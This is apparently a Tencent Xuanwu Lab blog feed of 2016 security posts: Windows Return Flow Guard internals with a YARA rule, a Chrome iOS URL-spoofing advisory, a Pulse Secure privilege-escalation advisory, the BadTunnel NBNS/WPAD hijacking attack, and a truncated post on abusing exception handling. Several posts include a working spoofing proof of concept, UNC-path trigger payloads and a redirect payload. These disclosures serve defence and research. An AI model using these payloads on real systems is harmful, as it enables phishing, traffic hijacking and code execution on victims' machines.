Tencent's Xuanwu Lab http://xlab.tencent.com/en Wed, 21 Dec 2016 08:35:57 +0000 en-US hourly 1 https://wordpress.org/?v=4.6 Return Flow Guard http://xlab.tencent.com/en/2016/11/02/return-flow-guard/ Wed, 02 Nov 2016 06:29:27 +0000 http://xlab.tencent.com/en/?p=137 Continue reading "Return Flow Guard"]]> [DannyWei, lywang, FlowerCode] of Tencent Xuanwu Lab

Here is a preliminary documentation of the RFG implementation. We will update it once we have new findings and corrections.

We analyzed the Return Flow Guard introduced in Windows 10 Redstone 2 14942, released on October 7, 2016.


Microsoft introduced Control Flow Guard in Windows 8.1 to protect against malicious modification of indirect call function pointers. CFG checks the target function pointer before each indirect call. However, CFG cannot detect modification of the return address on stack, or Return Oriented Programming.
The newly added RFG effectively stops these kind of attacks by saving the return address to fs:[rsp] at the entry of each function, and compare it with the return address on stack before returning.
Enabling RFG require both compiler and operating system support. During compilation, the compiler instruments the file by reserving a certain number of instruction spaces in the form of nop instructions.
When the target executable runs on a supported operating system, the reserved spaces are dynamically replaced with RFG instructions to check function return addresses. Otherwise, these nop instructions will not interfere with normal execution flow of the program.
The difference between RFG and GS (Buffer Security Check) is that the stack cookie can be obtained by using information leak or brute forcing, the RFG return address is written to the Thread Control Stack out of reach of attackers. This significantly increased the difficulty of the attack.



This variable is controlled by a registry value located at:

\Registry\Machine\SYSTEM\CurrentControlSet\Control\Session Manager\kernel
EnableRfg : REG_DWORD

2.1.1 Initialization

KiSystemStartup -> KiInitializeKernel -> InitBootProcessor -> CmGetSystemControlValues


Control flags are stored in the IMAGE_LOAD_CONFIG_DIRECTORY64 structure in PE file.
Flags in GuardFlag field indicate RFG support status.

#define IMAGE_GUARD_RF_INSTRUMENTED                    0x00020000 // Module contains return flow instrumentation and metadata
#define IMAGE_GUARD_RF_ENABLE                          0x00040000 // Module requests that the OS enable return flow protection
#define IMAGE_GUARD_RF_STRICT                          0x00080000 // Module requests that the OS enable return flow protection in strict mode


2.3.1 Querying

The RFG status can be queried through Win32 API GetProcessMitigationPolicy.

// ...
    ProcessReturnFlowGuardPolicy = 11
// ...

2.3.2 Structure Definition

    union {
        DWORD Flags;
        struct {
            DWORD EnableReturnFlowGuard : 1;
            DWORD StrictMode : 1;
            DWORD ReservedFlags : 30;



RFG instrumented portable executables have added several new fields, 24 bytes in total.

ULONGLONG  GuardRFFailureRoutine; 
ULONGLONG  GuardRFFailureRoutineFunctionPointer; 
DWORD      DynamicValueRelocTableOffset;
WORD       DynamicValueRelocTableSection;

2 pointers (16 bytes):
Virtual Address of the _guard_ss_verify_failure function
Virtual address of the _guard_ss_verify_failure_fptr function pointer, which points to the _guard_ss_verify_failure_default function by default.

Information about the address table (6 bytes):
DynamicValueRelocTableOffset recording the offset of dynamic relocation table relative to the relocation table, and
DynamicValueRelocTableSection recorded the section index of the dynamic value relocation table.
The remaining bytes are reserved.


RFG instrumented portable executables have a new dynamic relocation table after the normal relocation table.

    DWORD Version;
    DWORD Size;
//  IMAGE_DYNAMIC_RELOCATION DynamicRelocations[0];

    PVOID Symbol;
    DWORD BaseRelocSize;
//  IMAGE_BASE_RELOCATION BaseRelocations[0];

typedef struct _IMAGE_BASE_RELOCATION {
    DWORD   VirtualAddress;
    DWORD   SizeOfBlock;
//  WORD    TypeOffset[1];
Symbol in IMAGE_DYNAMIC_RELOCATION indicates the stored entries are for function prologues or function epilogues, defined as follows:

The absolute address of an entry can be calculated from ImageBase + VirtualAddress + TypeOffset.



4.1.1 Inserted Prologue Bytes (9 Bytes)

xchg    ax, ax
nop     dword ptr [rax+00000000h]
4.1.2   Inserted Epilogue Bytes (Example, 15 Bytes)
db 0Eh dup(90h)

4.1.2 Inserted Epilogue Bytes (Example, 15 Bytes)

db 0Eh dup(90h)

To reduce overhead, the compiler also inserts a _guard_ss_common_verify_stub function. Instead of inserting nop bytes at the end of every function, the compiler simply ends most function with a jmp to this stub function. This stub function has nop bytes to be replaced with epilogue bytes by the kernel at runtime, and a retn instruction at the end.

__guard_ss_common_verify_stub proc near
db 0Eh dup(90h)
__guard_ss_common_verify_stub endp


MiPerformRfgFixups performs the instruction replacement according to function information stored in IMAGE_DYNAMIC_RELOCATION_TABLE when new executable section is being created.

4.2.1 Replaced Prologue Bytes (9 Bytes)

The kernel uses MiRfgInstrumentedPrologueBytes to replace compiler inserted prologue bytes.

mov     rax, [rsp]
mov     fs:[rsp], rax

4.2.2 Replaced Epilogue Bytes (15 Bytes)

The kernel uses MiRfgInstrumentedEpilogueBytes and _guard_ss_verify_failure function address recorded in to replace the compiler inserted epilogue bytes.

mov     r11, fs:[rsp]
cmp     r11, [rsp] 


To implement RFG, Microsoft introduced Thread Control Stack, and reused the fs segment register on x64 architecture. When RFG enabled process executes the mov fs:[rsp], rax instructions, fs segment register points to the current thread’s ControlStackLimit on the control stack, and write rax into rsp offset.
All user mode threads in one process are using different memory blocks within same Thread Control Stack. We can enumerate the virtual address descriptor tree of the process to obtain the _MMVAD structure that describes the process’s Thread Control Stack.

    typedef struct _MMVAD {
      /* 0x0000 */ struct _MMVAD_SHORT Core;
      union {
        union {
          /* 0x0040 */ unsigned long LongFlags2;
          /* 0x0040 */ struct _MMVAD_FLAGS2 VadFlags2;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u2;
      /* 0x0044 */ long Padding_;
      /* 0x0048 */ struct _SUBSECTION* Subsection;
      /* 0x0050 */ struct _MMPTE* FirstPrototypePte;
      /* 0x0058 */ struct _MMPTE* LastContiguousPte;
      /* 0x0060 */ struct _LIST_ENTRY ViewLinks;
      /* 0x0070 */ struct _EPROCESS* VadsProcess;
      union {
        union {
          /* 0x0078 */ struct _MI_VAD_SEQUENTIAL_INFO SequentialVa;
          /* 0x0078 */ struct _MMEXTEND_INFO* ExtendedInfo;
        }; /* size: 0x0008 */
      } /* size: 0x0008 */ u4;
      /* 0x0080 */ struct _FILE_OBJECT* FileObject;
    } MMVAD, *PMMVAD; /* size: 0x0088 */

    typedef struct _MMVAD_SHORT {
      union {
        /* 0x0000 */ struct _RTL_BALANCED_NODE VadNode;
        /* 0x0000 */ struct _MMVAD_SHORT* NextVad;
      }; /* size: 0x0018 */
      /* 0x0018 */ unsigned long StartingVpn;
      /* 0x001c */ unsigned long EndingVpn;
      /* 0x0020 */ unsigned char StartingVpnHigh;
      /* 0x0021 */ unsigned char EndingVpnHigh;
      /* 0x0022 */ unsigned char CommitChargeHigh;
      /* 0x0023 */ unsigned char SpareNT64VadUChar;
      /* 0x0024 */ long ReferenceCount;
      /* 0x0028 */ struct _EX_PUSH_LOCK PushLock;
      union {
        union {
          /* 0x0030 */ unsigned long LongFlags;
          /* 0x0030 */ struct _MMVAD_FLAGS VadFlags;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u;
      union {
        union {
          /* 0x0034 */ unsigned long LongFlags1;
          /* 0x0034 */ struct _MMVAD_FLAGS1 VadFlags1;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u1;
      /* 0x0038 */ struct _MI_VAD_EVENT_BLOCK* EventList;
    } MMVAD_SHORT, *PMMVAD_SHORT; /* size: 0x0040 */

    typedef struct _RTL_BALANCED_NODE {
      union {
        /* 0x0000 */ struct _RTL_BALANCED_NODE* Children[2];
        struct {
          /* 0x0000 */ struct _RTL_BALANCED_NODE* Left;
          /* 0x0008 */ struct _RTL_BALANCED_NODE* Right;
        }; /* size: 0x0010 */
      }; /* size: 0x0010 */
      union {
        /* 0x0010 */ unsigned char Red : 1; /* bit position: 0 */
        /* 0x0010 */ unsigned char Balance : 2; /* bit position: 0 */
        /* 0x0010 */ unsigned __int64 ParentValue;
      }; /* size: 0x0008 */
    } RTL_BALANCED_NODE, *PRTL_BALANCED_NODE; /* size: 0x0018 */

    typedef struct _RTL_AVL_TREE {
      /* 0x0000 */ struct _RTL_BALANCED_NODE* Root;
    } RTL_AVL_TREE, *PRTL_AVL_TREE; /* size: 0x0008 */

    typedef struct _EPROCESS {
        struct _RTL_AVL_TREE VadRoot;

We can use _EPROCESS.VadRoot to walk through the VAD tree. If _MMVAD.Core.VadFlags.RfgControlStack flag is set, the current _MMVAD describes the virtual memory address range of the thread control stack (StartingVpn, EndingVpn, StartingVpnHigh, EndingVpnHigh in _MMVAD.Core), defined as follows:

    typedef struct _MMVAD_FLAGS {
      struct /* bitfield */ {
        /* 0x0000 */ unsigned long VadType : 3; /* bit position: 0 */
        /* 0x0000 */ unsigned long Protection : 5; /* bit position: 3 */
        /* 0x0000 */ unsigned long PreferredNode : 6; /* bit position: 8 */
        /* 0x0000 */ unsigned long NoChange : 1; /* bit position: 14 */
        /* 0x0000 */ unsigned long PrivateMemory : 1; /* bit position: 15 */
        /* 0x0000 */ unsigned long PrivateFixup : 1; /* bit position: 16 */
        /* 0x0000 */ unsigned long ManySubsections : 1; /* bit position: 17 */
        /* 0x0000 */ unsigned long Enclave : 1; /* bit position: 18 */
        /* 0x0000 */ unsigned long DeleteInProgress : 1; /* bit position: 19 */
        /* 0x0000 */ unsigned long PageSize64K : 1; /* bit position: 20 */
        /* 0x0000 */ unsigned long RfgControlStack : 1; /* bit position: 21 */ 
        /* 0x0000 */ unsigned long Spare : 10; /* bit position: 22 */
      }; /* bitfield */
    } MMVAD_FLAGS, *PMMVAD_FLAGS; /* size: 0x0004 */

    typedef struct _MI_VAD_EVENT_BLOCK {
      /* 0x0000 */ struct _MI_VAD_EVENT_BLOCK* Next;
      union {
        /* 0x0008 */ struct _KGATE Gate;
        /* 0x0008 */ struct _MMADDRESS_LIST SecureInfo;
        /* 0x0008 */ struct _RTL_BITMAP_EX BitMap;
        /* 0x0008 */ struct _MMINPAGE_SUPPORT* InPageSupport;
        /* 0x0008 */ struct _MI_LARGEPAGE_IMAGE_INFO LargePage;
        /* 0x0008 */ struct _ETHREAD* CreatingThread;
        /* 0x0008 */ struct _MI_SUB64K_FREE_RANGES PebTebRfg;
        /* 0x0008 */ struct _MI_RFG_PROTECTED_STACK RfgProtectedStack;
      }; /* size: 0x0038 */
      /* 0x0040 */ unsigned long WaitReason;
      /* 0x0044 */ long __PADDING__[1];
    } MI_VAD_EVENT_BLOCK, *PMI_VAD_EVENT_BLOCK; /* size: 0x0048 */

    typedef struct _MI_RFG_PROTECTED_STACK {
      /* 0x0000 */ void* ControlStackBase;
      /* 0x0008 */ struct _MMVAD_SHORT* ControlStackVad;

When a RFG protected thread is created, nt!MmSwapThreadControlStack sets the thread’s ETHREAD.UserFsBase. It uses MiLocateVadEvent to search for MMVAD to be set as UserFsBase.
It uses the following formula to calculate the ETHREAD.UserFsBase:

ControlStackBase = MMVAD.Core.EventList.RfgProtectedStack.ControlStackBase
ControlStackLimitDelta = ControlStackBase - (MMVAD.Core.StartingVpnHigh * 0x100000000 + MMVAD.Core.StartingVpn ) * 0x1000
ETHREAD.UserFsBase = ControlStackLimitDelta

Each thread has its own shadow stack range in Thread Control Stack. If the current thread uses range ControlStackBase ~ ControlStackLimit, then ControlStackLimit = KTHTREAD.StackLimit + ControlStackLimitDelta. So the actual value stored in UserFsBase is the offset of ControlStackLimit from StackLimit. When multiple threads access the shadow stack simultaneously, the actual address accessed is located at ETHREAD.UserFsBase + rsp.


We wrote a simple yara signature to identify RFG instrumented PE file.

rule rfg {
        $pe = { 4d 5a }
        $a = { 66 90 0F 1F 80 00 00 00 00 }
        $b = { C3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 C3 }
        $c = { E9 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 E9 }

        $pe at 0 and $a and ($b or $c)


yara64.exe -r -f rfg.yara %SystemRoot%

We can observe from the output that most system executable files are already RFG instrumented in this version of Windows.
Here we use IDA Pro and WinDbg to examine a RFG instrumented calc.exe.

.text:000000014000176C wWinMain
.text:000000014000176C                 xchg    ax, ax
.text:000000014000176E                 nop     dword ptr [rax+00000000h]

The entry point before runtime replacement

0:000> u calc!wWinMain
00007ff7`91ca176c 488b0424        mov     rax,qword ptr [rsp]
00007ff7`91ca1770 6448890424      mov     qword ptr fs:[rsp],rax

The entry point after runtime replacement

.text:00000001400025BC __guard_ss_common_verify_stub
.text:00000001400025BC                 retn
.text:00000001400025BD                 db 0Eh dup(90h)
.text:00000001400025CB                 retn

The common verify stub function before runtime replacement

0:000> u calc!_guard_ss_common_verify_stub
00007ff7`91ca25bc 644c8b1c24      mov     r11,qword ptr fs:[rsp]
00007ff7`91ca25c1 4c3b1c24        cmp     r11,qword ptr [rsp]
00007ff7`91ca25c5 0f85f5000000    jne     calc!_guard_ss_verify_failure (00007ff7`91ca26c0)
00007ff7`91ca25cb c3              ret

The common verify stub function after runtime replacement


Exploring Control Flow Guard in Windows 10 Jack Tang, Trend Micro Threat Solution Team

CVE-2016-1707 Chrome Address Bar URL Spoofing on IOS http://xlab.tencent.com/en/2016/10/10/cve-2016-1707-chrome-address-bar-url-spoofing-on-ios/ Mon, 10 Oct 2016 03:18:36 +0000 http://xlab.tencent.com/en/?p=91 Continue reading "CVE-2016-1707 Chrome Address Bar URL Spoofing on IOS"]]> Address Bar URL Spoofing on IOS Chrome (CVE-2016-1707), I report the vulnerability to Google in June 2016. Spoofing URL vulnerability can be forged a legitimate Web site address. Attacker can exploit this vulnerability to launch phishing attack.

Affected version: Chrome < v52.0.2743.82, IOS < v10

0x01 Vulnerability Details




function pwned() {

    var t = window.open('https://www.gmail.com/', 'aaaa');
    t.document.write("<h1>Address bar says https://www.gmail.com/ - this is NOT https://www.gmail.com/</h1>");


<a href="https://hack.com::/"  target="aaaa" onclick="setTimeout('pwned()','500')">click me</a><br>

How the vulnerability happened? First click on the ‘click me’ link, The browser opens a new window called aaaa, this page loads the “https://hack.com::”, this address can be casually write. Continue running Pwned () after 500 microseconds , open the ‘https://www.gmail.com’ in the aaaa window, of course, this URL can be empty. Up to now, all the code is running well, and the next code is the core code to trigger the vulnerability.

base64 payload code:

    var link = document.createElement('a');
    link.href = 'https://gmail.com::';

Begin loading ‘https://gmail.com::’ in aaaa window , happying, Chrome allows to load ‘https://gmail.com::’, and then chrome address as a pending entry. Because ‘https://gmail.com::’ is an invalid address, i think Chrome should jump to about:blank, but chrome commits pending entry (‘https://gmail.com::’) and promotes it as a last committed URL. At this point, the entire loading process is completed. A perfect Spoofing URL vulnerability was born.

Online demo:



0x02 Fixed

[IOS] Do not commit invalid URLs during web load.

[self optOutScrollsToTopForSubviews];

// Ensure the URL is as expected (and already reported to the delegate). - DCHECK(currentURL == _lastRegisteredRequestURL) + // If |_lastRegisteredRequestURL| is invalid then |currentURL| will be + // "about:blank". + DCHECK((currentURL == _lastRegisteredRequestURL) || + (!_lastRegisteredRequestURL.is_valid() && + _documentURL.spec() == url::kAboutBlankURL)) << std::endl << "currentURL = [" << currentURL << "]" << std::endl << "_lastRegisteredRequestURL = [" << _lastRegisteredRequestURL << "]"; // This is the point where the document's URL has actually changed, and // pending navigation information should be applied to state information. [self setDocumentURL:net::GURLWithNSURL([_webView URL])]; - DCHECK(_documentURL == _lastRegisteredRequestURL); + + if (!_lastRegisteredRequestURL.is_valid() && + _documentURL != _lastRegisteredRequestURL) { + // if |_lastRegisteredRequestURL| is an invalid URL, then |_documentURL| + // will be "about:blank". + [[self sessionController] updatePendingEntry:_documentURL]; + } + DCHECK(_documentURL == _lastRegisteredRequestURL || + (!_lastRegisteredRequestURL.is_valid() && + _documentURL.spec() == url::kAboutBlankURL)); + self.webStateImpl->OnNavigationCommitted(_documentURL); [self commitPendingNavigationInfo]; if ([self currentBackForwardListItemHolder]->navigation_type() ==

0x03 Discloure Timeline:

2016/6/22 Report to Google,https://bugs.chromium.org/

2016/6/22 Google assigned,Security_Severity-High

2016/7/14 Google reward $3000

2016/7/20 Google advisory disclosed,CVE-2016-1707

2016/10/2 Google allpublic disclosed

0x04 References

[1] https://googlechromereleases.blogspot.com/2016/07/stable-channel-update.html

[2] https://bugs.chromium.org/p/chromium/issues/detail?id=622183

[3] https://chromium.googlesource.com/chromium/src/+/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5

Pulse Secure Desktop Client (Juniper Junos Pulse) Privilege Escalation http://xlab.tencent.com/en/2016/07/19/xlab-16-001/ Tue, 19 Jul 2016 10:00:11 +0000 http://xlab.tencent.com/en/?p=52 Continue reading "Pulse Secure Desktop Client (Juniper Junos Pulse) Privilege Escalation"]]> XLAB ID: XLAB-16-001     

CVE ID: CVE-2016-2408     

Patch Status: Fixed

Affected Products:
– Pulse Secure Desktop Client (Juniper Junos Pulse) All Versions up to v5.2r3

Vendor Provided (see vendor advisory in Solution section for details):
– Pulse Secure Desktop Client 5.2R1 to 5.2R2, 5.1R1 to 5.1R9, 5.0R1 to 5.0R15
– Standalone Pulse Installer Service 8.2R1 to 8.2R2, 8.1R1 to 8.1R9, 8.0R1 to 8.0R15, 7.4R1 to 7.4R13.6
– Pulse Secure Collaboration 8.2R1 to 8.2R2, 8.1R1 to 8.1R9, 8.0R1 to 8.0R15
– Odyssey Access Client all versions before 5.6R16

This vulnerability only affects Windows operating system.

“The Pulse Secure desktop client provides a secure and authenticated connection from an endpoint device (either Windows or Mac OS X) to a Pulse Secure gateway (either Pulse Connect Secure or Pulse Policy Secure).”

Vulnerability Details:
Juniper Junos Pulse (now known as Pulse Secure Desktop Client) installs a system service dsAccessService.exe, which owns a named pipe NeoterisSetupService.

This named pipe has an Everyone Full Control ACL and is writable by all users.

The pipe server employs a custom encryption function. The key is derived from processor type, processor frequency, operating system product id, operating system version, and hardcoded values.

This pipe is used to install new services, possibly for automatic upgrade purpose. Once new data is received from the pipe, it is decrypted as a file path, and the specified file is copied to C:\Windows\Temp\ and executed.

The service installation logic is implemented in dsInstallService.dll. It reads the path and split file name from the path. But this implementation has a bug which cause it to only split string after the “\” character from the path, but not the “/” character.

Pass in a path such as “C:\Users/Guest/AppData/Local/test.exe” will cause it to use “Users/Guest/AppData/Local/test.exe” as the file name, and CopyFile to path “C:\Windows\Temp\Users/Guest/AppData/Local/test.exe”.

When the CopyFile fails, the program then uses the original path “C:\Users/Guest/AppData/Local/test.exe” to create new process.

Finally, the service will verify the digital signature before executing the file. However, since the path is completely controllable by the attacker, simply placing a signed executable under “C:\Users/Guest/AppData/Local/” and hijack the executable with a malicious DLL can trigger arbitrary code execution and privilege escalation to SYSTEM.

Install the latest version of Pulse Secure product, which is available from Pulse Secure official website.
Pulse Secure has also issued an advisory about this vulnerability:

Disclosure Timeline:

2016/02/18 Report vulnerability to MITRE
2016/02/18 MITRE assigned CVE-ID CVE-2016-2408
2016/02/18 Provide vulnerability detail and CVE-ID to Pulse Secure via psirt at pulsesecure.net
2016/02/18 Pulse Secure responded that they are developing a fix, but no timeline is available
2016/03/07 Pulse Secure responded that they are still developing a fix, but no timeline is available,
“update soon”
2016/03/25 Pulse Secure responded that they are still developing a fix, but no timeline is available
2016/04/22 Notify Pulse Secure it is now 63 days since original report, asking fix progress
2016/04/26 Pulse Secure responded that they are still developing a fix, but no timeline is available,
asking for grace periods
2016/05/03 Reply that we do give grace periods but need an ETA
2016/05/12 Pulse Secure responded that they are still developing a fix, but no timeline is available
2016/05/19 Pulse Secure responded that they are still developing a fix, ETA is October 2016,
asking for grace periods
2016/05/20 Reply that we do not give grace period this long and another 60 days is the maximum.
2016/05/20 Pulse Secure responded that another 60 days is acceptable
2016/07/18 Pulse Secure responded that an issue has been found in internal testing, and
request another extension to August 1, 2016.
2016/07/18 Reply that we have already requested coordination from multiple organizations and
the process is irreversible. Last day is July 25, 2016.
2016/07/25 Coordinated disclosure

This vulnerability was discovered by:   Zhipeng Huo

BadTunnel – A New Hope http://xlab.tencent.com/en/2016/06/17/badtunnel-a-new-hope/ Fri, 17 Jun 2016 08:20:27 +0000 http://xlab.tencent.com/en/?p=88 Continue reading "BadTunnel – A New Hope"]]>

This article purposes a new attack model to hijack TCP/IP broadcast protocol across different network segment, named “BadTunnel”.

With this method, NetBIOS Name Service Spoofing can be achieved, regardless of the attacker and the victim is on the same or different network, the firewalls and NAT devices in between. All it need is the victim navigate to a malicious web page with IE or Edge, or open a specially crafted document, and the attacker can hijack the victim’s NetBIOS name query to spoof as print server or file server in the local network.

By hijacking the WAPD name, the attacker can hijack all network communications, including but not limited to usual web accesses, Windows Update service and Microsoft Crypto API Certificate revocation list updates. Once the hijack is successful, it is easy to achieve arbitrary execution of program on the target system by using Evilgrade [1].

This method is effective on all Windows versions before the June 2016 patch, and can be exploited through all Internet Explorer, Microsoft Edge, and Microsoft Office versions, and can also be exploited through third-party applications. In fact, BadTunnel attack can be conducted on anywhere that a file URI scheme or UNC path can be embedded. For example, if a shortcut’s icon path is pointed to the malicious file URI scheme or UNC path, the BadTunnel attack can be triggered at the moment the user sees it in the Windows Explorer, which means BadTunnel can also be exploited through web pages, emails, USB flash drives and many other ways. It can even impact Web servers and SQL servers [2].

(This article does not include all contents covered by the BadTunnel research, the remaining part will be released in my presentation “BadTunnel: How do I get Big Brother power” on BlackHat US 2016.)

0x00 Background

NetBIOS is an ancient protoco. In 1987, IETF released RFC 1001 and RFC 1002, which defined NetBIOS over TCP/IP or NBT for short. NetBIOS includes three services, among them the Name service NetBIOS-NS, or NBNS for short. NBNS can resolve local names by broadcasting in the LAN.

When trying to access \\Tencent\Xuanwu\Lab\tk.txt, NBNS will send a NBNS NB query to the broadcast address:

Who is “Tencent”?

Any host in LAN can respond to this request:

“Tencent” is at

Then the victim’s computer will accept this response and tries to access \\\XuanwuLab\tk.txt.

This mechanism is definitely not safe, but since LAN is usually treated as trusted network, this spoofing possibility is not considered as vulnerability – just like the ARP Spoofing.

WPAD (Web Proxy Auto-Discovery Protocol) is another ancient protocol with over 20 years of history. As the name suggests, it is used for automatically discover and configure system proxy. Almost all operating systems support WPAD, but only Windows enable it by default. According to this protocol, Windows tries to resolve the name http://WPAD/wpad.dat to retrieve proxy configuration script.

On Windows, the name “WPAD” is resolved by NBNS. As previously stated, any host can claim it is “WPAD” in a LAN. This is not secure but acceptable since the LAN is considered trusted network environment. Although WPAD hijacking has been found more than a decade ago and used by the Flame worm, it is not considered as security vulnerability – just like the ARP Spoofing.

NBNS is implemented on top of the UDP protocol, which is a stateless protocol. Firewalls, NAT devices and other network devices cannot distinguish which session the UDP packet belongs to, so they must allow the UDP packet on both directions.

NBNS name query uses the broadcast protocol, but like most other broadcast protocols, NBNS accept responses from outside the network segment. Which means, if sends a request to, but responds in time, the response will be accepted by In some enterprise networks, this is required by the network topology.

0x01 Implementation

If we could send a fake response from outside the network segment when the name query is performed by the NBNS, it can still be accepted. Therefore, NBNS Spoofing across different network segment is possible, but with a few problems:

  1. Most hosts have firewall enabled, which makes it impossible to send data to the host. Even if there is no firewall, there is no way to directly send data from internet to intranet. Does that mean we can only do NBNS Spoofing to these systems that have public IP address and no firewall enabled?
  2. There is a DNS protocol look-alike encapsulated within the NBNS protocol, so it also includes a Transaction ID. Only packets with matching Transaction IDs are accepted.
  3. How do we know when to send the NBNS Spoofing packet, if the host outside the LAN cannot receive the NBNS NB query broadcast?

Fortunately, all these problems can be solved.

First, the Windows operating system only uses 137/UDP port for NBNS. “Only” means that the source and target ports are always 137/UDP. If an intranet host is sending NBNS request to, it will look like this: -> NAT:54231 ->

The response from will look like this: <- NAT:54231 <-

That is, the local firewalls on or NAT, or any other intermediate network devices, must allow any UDP packet from to to pass through in a certain amount of time, if it allows the query at all. This opens up a dual direction UDP tunnel, hence the name BadTunnel: <-> NAT:54231 <->

One quick experiment to help you understand this tunnel:

Prepare two systems with firewall enabled, with IP address set to and, respectively.

On, execute command “nbtstat -A”, it will fail.

On, execute command “nbtstat -A”, it will success.

On, execute “nbtstat -A” once again, it will success.

How can we make send a NBNS request to When Windows is trying to access a file URI scheme or UNC path with IP address, if the 139 and 445 port of the target is inaccessible – either timed out or been reset– the system will send a NBNS NBSTAT query to this IP address. There are numerous ways to make a system access a file URI scheme or UNC path.

The Microsoft Edge and Internet Explorer both try to resolve the file URI scheme or UNC path in the web page:

<img src=”\\\BadTunnel”>

All types of Microsoft Office documents can have embedded file URI scheme or UNC path, the same is true for many third-party document types.

If we have a shortcut with icon path point to a UNC path, this UNC path is accessed once the shortcut is shown on the screen.

If the target is a web server, maybe only one HTTP request is needed:


The NBNS Transaction ID is not random but incremental. As we have noted previously, the NBNS sends a NBNS NB query when resolving a name; the system sends a NBNS NBSTAT query when failing to access a file URI scheme or UNC path. NBNS NB query and NBNS NBSTAT query not only uses the same 137/UDP port, but also shares the same Transaction ID counter. That is, when fails to access \\\BadTunnel, the NBNS NBSTAT query it send to not only opens up a dual direction UDP tunnel, but also leaks the Transaction ID value to

That is, a single NBNS NBSTAT query solved both problem 1 and 2. And the third problem is even easier to solve. Just like we can embed <img src=”\\\BadTunnel”> in our web page, we can also embed:

<img src=”http://WPAD/wpad.dat” >

In this way, we can control the time the system sends the NBNS NB query to WPAD, so we can craft our response in time. Finally the system will cache the response to http://WPAD/wpad.dat in its web cache. Later, when the system is requesting http://WPAD/wpad.dat to set proxy configuration, it will retrieve from the web cache. At least for Windows 7, the spoofed http://WPAD/wpad.dat will persist after reboots, just like other web resources.

Even if Web cache is not in place, the NBNS has its own caching mechanism. With one successful NBNS Spoofing, the spoofed response will be cached for 10 minutes:

In the next 10 minutes the operating system itself will also try to resolve the WPAD name and access http://WPAD/wpad.dat to download proxy configurations, so it will get the spoofed response. Once the attacker has successfully hijacked the user’s network flow, he can periodically redirect certain HTTP requests to make the BadTunnel attack persistent:

HTTP/1.1 302 Found
Content-Type: text/html
Location: file://
Content-Length: 0

0x02 Conclusion

The BadTunnel attack described in this article is a serious security problem, and the root cause is not obvious to find. The following dependencies are required for the attack to be successful:

  1. UDP protocol is connectionless.
  2. Broadcast requests can accept response from outside the network segment.
  3. WPAD is enabled by default on Windows.
  4. Windows file APIs supports UNC path by default.
  5. When Windows fails to access a UNC path by connecting to 139 and 445 ports, a NBNS NBSTAT query will be performed.
  6. NBNS always uses the same port on the client and server side.
  7. NBNS Transaction ID uses a counter rather than a RNG.
  8. NBNS NBSTAT query and NBNS NB query shares the same counter.
  9. WPAD shares the same Web and NBNS cache with other applications in the system.

These designs do not seem to be a problem independently; some are even required. We certainly can’t blame UDP for connectionless. Even the NBNS Transaction ID is not randomly generated, this alone does not become security vulnerability. The NBNS NB mechanism was designed for the intranet, and any host in the intranet can receive the NBNS NB query broadcast packets. However, although seems not to be a problem independently, they become a massive vulnerability when work collaboratively. How can we find the next BadTunnel?

0x03 Mitigation Recommendations

Even if the MS16-063 and MS16-077 patch cannot be installed immediately, there are workarounds that can stop the BadTunnel attack.

For enterprises, they can drop the 137/UDP packets on perimeter firewalls.

For end users that do not need to access Windows network sharing services, NetBIOS over TCP/IP can be disabled:

For minimal compatibility impact, WPAD address can be pinned to in %SystemRoot%System32driversetchosts, or the automatic proxy discovery can be disabled to prevent hijacking:

However, BadTunnel is not limited to WPAD, and this does not stop hijacking of other names.

0x04 A Little Disappointment

Using BadTunnel to hijack WPAD is possibly the Windows vulnerability that has the widest impact and most exploit channels in the history. It is also the only vulnerability that can target all versions of Windows with one exploit. It could have been more interesting.

Apple’s Mac OS also implemented NetBIOS, and supports UNC path in some cases. WPAD can also be manually enabled on it. However, due to the difference in the implementation details of NetBIOS protocol, this attack does not affect the Mac OS – it would be much cooler otherwise.

0x05 Refrences

[1] Evilgrade

[2] 10 Places to Stick Your UNC Path

[3] Web Proxy Auto-Discovery Protocol

[4] NetBIOS Over TCP/IP

[5] Disable WINS/NetBT name resolution

[6] MS99-054, CVE-1999-0858

[7] MS09-008, CVE-2009-0093, CVE-2009-0094

[8] MS12-074, CVE-2012-4776

[9] MS16-063, CVE-2016-3213

[10] MS16-077, CVE-2016-3213, CVE-2016-3236

Exceptions in Exceptions – Abusing Special Cases in System Exception Handling to Achieve Unbelievable Vulnerability Exploitation http://xlab.tencent.com/en/2016/04/19/exception-in-exception/ Tue, 19 Apr 2016 08:21:21 +0000 http://xlab.tencent.com/en/?p=86 Continue reading "Exceptions in Exceptions – Abusing Special Cases in System Exception Handling to Achieve Unbelievable Vulnerability Exploitation"]]>

Memory Read / Write / Execute attributes are one of the most important part of system security. Usually it is mandatory to have writable attribute set before overwriting a block of memory, and executable attribute set before executing code in a block of memory, otherwise an exception is generated. However, there are some special cases in the Windows exception handling procedure that we can take advantage of. By abusing such exceptions, we could write to the unwritable, and execute the unexecutable.

0x01 Directly modify read-only memory locations

In my CanSecWest 2014 talk “ROPs are for the 99%” I introduced an interesting technique – by modifying some flag in JavaScript objects, we can disable the safe mode and let Internet Explorer (IE) load dangerous objects such as WScript.Shell, and execute arbitrary code without worrying about the DEP.

Modifying SafeMode flag isn’t the only way to let IE load dangerous objects.

Some parts of IE are actually implemented in HTML. These HTML code are usually stored in the resource section of ieframe.dll. for example, the print preview page is in res://ieframe.dll/preview.dlg, organize favorites page is in res://ieframe.dll/orgfav.dlg, page properties page is in res://ieframe.dll/docppg.ppg, and so on.

IE will create separate renderer and JavaScript engine instances for these HTML, but the SafeMode is disabled by default in these new JavaScript engine instances.

Therefore, we only need to insert our JavaScript code into the resource section of ieframe.dll, and trigger the corresponding IE functionality, the code will be executed as if it is part of the IE functionality in a SafeMode disabled JavaScript engine instance.

But the resource section of the PE file is read-only. If we use a write-what-where vulnerability to modify the resource of ieframe.dll, an access violation exception is generated:

eax=00000041 ebx=1e2e31b0 ecx=00000000 edx=00000083 esi=1e2e31b0 edi=68b77fe5
eip=69c6585f esp=0363ac00 ebp=0363ac84 iopl=0         nv up ei pl nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
69c6585f 88040f          mov     byte ptr [edi+ecx],al      ds:002b:68b77fe5=76
0:008> !exchain
